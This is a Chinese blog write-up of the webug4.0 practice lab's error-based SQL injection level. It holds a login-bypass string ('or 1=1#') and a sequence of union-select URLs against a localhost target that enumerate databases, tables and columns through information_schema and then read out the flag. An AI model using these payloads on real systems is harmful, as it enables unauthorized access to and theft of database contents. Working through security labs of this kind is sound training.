2. 程式人生 > >webug4.0顯錯註入-1

webug4.0顯錯註入-1

阿新 發佈:2019-03-14
password adf null 萬能密碼 1=1 str2 tables 內容 順序

所用到一些知識:

1. concat(str1,str2,...) 返回結果為參數間無間隔符連接起來的字符串,如果其中有一個參數為NULL,返回結果為NULL

2. concat_ws(separator, str1, str2, ...) 含有分隔符地連接字符串,第一個參數為制定的分隔符

3. group_concat(str1,str2,...)   連接一個組的所有字符串,並以逗號分隔每一條數據

4.union 用於合並兩個或多個select語句的結果集,需要註意的是union內部的select須擁有相同數量的列,且列的數據類型也要相同。

5.邏輯順序 true and false or true 結果為true 這樣可以構造萬能密碼 

Select * from admin where username=’admin’ and password=’’or 1=1#’

6. 註釋掉後面內容時可用 --+ 或者 # 後者在瀏覽器中會進行url編碼為%23

7.註入的一般流程為:輸入點-->數據庫-->數據表-->數據列-->數據項

好了進入正題,加單引號看看

http://localhost/control/sqlinject/manifest_error.php?id=1

                    然後報錯了

技術分享圖片

構造語句 ‘ or 1=1%23

http://localhost/control/sqlinject/manifest_error.php?id=1 or 1=1%23

然後頁面恢復正常,利用order by判斷字段個數

http://localhost/control/sqlinject/manifest_error.php?id=1 order by 1%23

從1開始嘗試,發現到3時頁面報錯,因此判斷字段個數為2個,接下來查看數據庫的名字

http://localhost/control/sqlinject/manifest_error.php?id=
 
1 union select 1,group_concat(schema_name) from information_schema.schemata%23

然後頁面顯示出來了數據庫

技術分享圖片

我們查看webug這個數據庫

http://localhost/control/sqlinject/manifest_error.php?id=1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=webug %23

技術分享圖片

發現有flag這個表(是的表面上是,等到第二關你會哭泣的),那就看看這個表裏東西

http://localhost/control/sqlinject/manifest_error.php?id=1 union select 1,group_concat(column_name) from information_schema.columns where table_name=flag %23

發現表裏就2個: id flag 查看一下flag內容

http://localhost/control/sqlinject/manifest_error.php?id=1 union select 1,flag from flag %23

出來了:dfafdasfafdsadfa

打開靶場提交flag,顯示flag正確

webug4.0顯錯註入-1

相關推薦

webug4.0-1

password adf null 萬能密碼 1=1 str2 tables 內容 順序 所用到一些知識: 1. concat(str1,str2,...) 返回結果為參數間無間隔符連接起來的字符串,如果其中有一個參數為NULL,返回結果為NULL 2. conc

別人的滲透測試(三)--SQL

XML -- 長度 upd html cnblogs http div col 續上一章。 安全狗攔下7成的人,過狗是門學問,偷笑.jpg。很感謝和https://home.cnblogs.com/u/xishaonian/ 博主能一起研究過狗。 說多了,言歸正傳SQL註入

SQL之mysql

顯錯註入 sql註入 mysql註入 在我們實際滲透中,明明發現一個註入點,本以為丟給sqlmap就可以了,結果sqlmap只顯示確實是註入點,但是數據庫卻獲取不了,如圖1所示,這時我們可以使用手工進行註入,判斷出過濾規則以及基本過濾情況,然後再選擇對應的sqlmap腳本(如果有的話),本

webug4.0延時-3

limit env span lec div 一個數 響應時間 返回 format /*打開這道題時,發現和第二關的鏈接一樣。既然作者考察的是延時註入就利用響應時間來判斷*/ 用延時註入時,我們一般不能從頁面直接獲取數據庫信息,所用知識與第二關基本相同 if(exp,1

XerCMS-1.0.3代碼審計(文件名報後臺getshell)

each orb his jpg pla module 將不 last self 鏈接:https://share.weiyun.com/6b98e41d036967178e1a21fb88ed340f (密碼:YnNY) 文件名報錯註入 index.php?m=memb

【代碼審計】XDCMS 報

信息 輸入 alt 變量 出現 img 語句 limit lec   審計的都是之前很老的一些的CMS,把學習的過程分享出來,如果有正在和我一起學習的兄弟們,希望看到文章之後會有所收獲 --------------------------------------------

Joomla!3.7.0 Core SQL漏洞動態調試草稿

src cnblogs phpstorm prop ets legacy gets oom users 從這個頁面開始下斷點:Joomla_3.7.0/components/com_fields/controller.php 調用父類的構造

SQL1

put com mysq secure name 字符 html mit rom <html> <head> Secure Web Login </head> <body> <?php if($_POST[user] &

MYSQL報方法整理

ipo poi floor extra 版本 註入 關鍵字 -1 format 1、通過floor暴錯 /*數據庫版本*/ SQL http://www.hackblog.cn/sql.php?id=1 and(select 1 from(select count(*)

【sqli-labs】 less19 POST - Header Injection - Referer field - Error based (基於頭部的Referer POST報)

span word form where sch select 技術 分享 less 這個和less18一樣,都是基於header的註入 這次的字段是referer Referer: 123‘ AND UpdateXml(1,concat(0x7e,database()

SQL報總結

字段 name tab extra SQ password get upd 報錯 1.Floor()報錯註入 關於Floor報錯註入原理可以看http://blog.51cto.com/wt7315/1891458 獲取數據庫 select count(*),(conca

實驗吧 簡單的SQL1

inf ble lag nba 實驗 .sh 關鍵詞 報錯 union 解題鏈接: http://ctf5.shiyanbar.com/423/web/ 解題思路:一, 輸入1,不報錯;輸入1‘,報錯;輸入1‘‘,不報錯。 二 , 輸入1 and 1=1,返回1

.NET Core的依賴[1]: 控制反轉

設計模式 完整 這樣的 服務註冊 -c pre too main service 寫在前面:我之前寫過一系列關於.NET Core依賴註入的文章,由於.NET Core依賴註入框架的實現原理發生了很大的改變,加上我對包括IoC和DI這些理論層面的東西又有了一些新的理解,所

union的幾道ctf題,實驗吧簡單的sql1,2,這個看起來有點簡單和bugku的成績單

需要 簡單 details 9.png lmap bug 輸入數據 php 接下來 這幾天在做CTF當中遇到了幾次sql註入都是union,寫篇博客記錄學習一下。 首先推薦一篇文章“https://blog.csdn.net/Litbai_zhan

Castle.Windsor依賴的高級應用_Castle.Windsor.3.1.0

mic sum port let 有一個 設置 .text per nbsp [轉]Castle.Windsor依賴註入的高級應用_Castle.Windsor.3.1.0 1. 使用代碼方式進行組件註冊【依賴服務類】 using System; using System

webug4.0寬字節-6

技術分享 顯示 rman form sel add strong 斜杠 反斜杠 0x00  前言 GBK是一種多字符編碼,一個漢字占2個字節,utf-8編碼的漢字占3個字節。 addslashes() 函數會對括號裏 (‘) 、(")、 (\)、 (NULL)、的四個

表單提交 防XSS 1入庫時轉義、後臺 2出庫轉義、前臺

his 驗證 替換字符 插入 如果 不同的 js代碼 urn ida 第一種 入庫過濾js自動填充時過濾js代碼class GoodsModel extends Model{ // 填充 protected $_auto = [ // 自己補充填充

PHPCMS v9.6.0 wap模塊 SQL

sed injection update pytho see repl nbsp per pre 調試這個漏洞的時候踩了個坑,影響的版本是php5.4以後。 由於漏洞是由parse_str()函數引起的,但是這個函數在gpc開啟的時候(也就是php5.4以下)會對單引號進行

【EF框架】使用params參數傳值防止SQL處理

collect oar mapping cnblogs ken datetime nbsp .com src 通過SqlParameter傳時間參數,代碼如下: var param = new List<SqlParamete

[CVE-2017-5487] WordPress <=4.7.1 REST API 內容漏洞分析與復現

tps 文章 分析 請求 利用 api文檔 each includes 什麽 不是很新的漏洞,記錄下自己的工作任務 漏洞影響: 未授權獲取發布過文章的其他用戶的用戶名、id 觸發前提:wordpress配置REST API 影響版本:<= 4.7 0x01漏洞